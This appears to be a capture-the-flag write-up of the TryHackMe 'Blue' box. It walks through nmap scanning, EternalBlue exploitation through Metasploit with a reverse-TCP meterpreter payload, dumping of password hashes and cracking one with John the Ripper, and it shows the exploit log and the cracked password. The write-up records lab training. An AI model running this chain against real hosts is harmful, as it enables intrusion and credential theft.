# blue

Writeup about the blue tryhackme box

intial nmap scans

```
nmap -sV -sC --script vuln -oN blue.nmap 10.10.151.151
```

Three ports which are open and not > 1000.

```
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
```

nmap vuln script scan results

```
 rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152

```

```
   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020

```

Which is actually out to be used vuln to be used for exploitation.

```
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/


```


```
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.10.151.151    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.17.8.19       yes       The listen address (an interface may be specified)
   LPORT     49167            yes       The listen port


```


Finally 

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.17.8.19:49167 
[*] 10.10.151.151:445 - Executing automatic check (disable AutoCheck to override)
[*] 10.10.151.151:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.151.151:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.151.151:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.151.151:445 - The target is vulnerable.
[*] 10.10.151.151:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.151.151:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.151.151:445     - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.151.151:445 - Connecting to target for exploitation.
[+] 10.10.151.151:445 - Connection established for exploitation.
[+] 10.10.151.151:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.151.151:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.151.151:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.151.151:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.151.151:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.151.151:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.151.151:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.151.151:445 - Sending all but last fragment of exploit packet
[*] 10.10.151.151:445 - Starting non-paged pool grooming
[+] 10.10.151.151:445 - Sending SMBv2 buffers
[+] 10.10.151.151:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.151.151:445 - Sending final SMBv2 buffers.
[*] 10.10.151.151:445 - Sending last fragment of exploit packet!
[*] 10.10.151.151:445 - Receiving response from exploit packet
[+] 10.10.151.151:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.151.151:445 - Sending egg to corrupted connection.
[*] 10.10.151.151:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.151.151
[*] Meterpreter session 1 opened (10.17.8.19:49167 -> 10.10.151.151:49183) at 2021-05-17 11:27:52 -0400
[+] 10.10.151.151:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.151.151:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.151.151:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

```


Sending the meterpreter session to the background using ctrl+Z. Get back the session using "sessions + the ID of the sessions." . 
To get the list of active sessions, type in `sessions`

```
meterpreter > 
Background session 1? [y/N]  
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.17.8.19:49167 -> 10.10.151.151:49183 (10.10.151.151)
```


Convert shell to meterpreter shell. 

```
msf6 auxiliary(scanner/smb/smb_ms17_010) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade


```


The SESSION options are required to be changed. 

```
msf6 auxiliary(scanner/smb/smb_ms17_010) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade


Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter

msf6 auxiliary(scanner/smb/smb_ms17_010) > Interrupt: use the 'exit' command to quit
msf6 auxiliary(scanner/smb/smb_ms17_010) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > show options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.

```



hashdump will let you dump all the password hashes. Copy them to a file in local system. 

```
hashdump 
```


Cracking the hashes using John the ripper

```
──(kali㉿kali)-[~/tryhackme/blue]
└─$ sudo john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt                                  1 ⚙
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22         (Jon)
1g 0:00:00:01 DONE (2021-05-17 12:04) 0.6410g/s 6538Kp/s 6538Kc/s 6538KC/s alr19882006..alpusidi
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
```

At the end the three flags need to be located and updated. Which can be done using the search command as well :-)